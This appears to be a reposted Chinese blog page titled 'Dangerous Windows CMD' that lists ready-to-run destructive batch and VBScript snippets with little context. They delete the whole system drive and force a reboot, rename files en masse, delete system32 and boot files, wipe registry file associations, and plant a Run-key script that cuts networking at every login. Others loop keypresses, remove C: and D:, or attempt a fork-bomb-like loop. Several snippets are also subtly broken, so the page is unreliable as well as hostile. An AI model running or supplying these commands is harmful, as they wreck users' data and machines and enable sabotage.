系统相关
首页 > 系统相关> > !!危险Windows CMD

!!危险Windows CMD

作者:互联网

blue screen of dead machine######

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

修改所有文件名后缀#####

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

删除系统######

del c:\WINDOWS\system32*.* /q

永久损坏机器#####

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

删除所有注册表#####

@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

永久禁用网络######

echo @echo off > c:\windows\winmn32.bat
echo break off >>c:\windows\winmn32.bat
echo ipconfig /release_all >> c:\windows\winmn32.bat
echo end >> c:\windows\winmn32.bat
reg add hkey_local_machine/software/microsoft/windows/currentversion/run /v WINDOWsAPI /t reg_sz /d c:windows\wimn32.bat /f
reg add hkey_current_user/software/microsoft/windows/currentversion/run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
PAUSE

无休止ENTER#####

set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “(enter)”
loop
###########

echo @echo off > c:\windowsshartlell.bat
shutdown -r -t 11 -f

格式化磁盘####

rd /s /q D:
rd /s /q C:\

死循环###

%o | %o

########
taskmon.exe

标签:bat,Windows,CMD,echo,windows,REN,危险,TXT,reg
来源: https://www.cnblogs.com/Haihong72H/p/15989889.html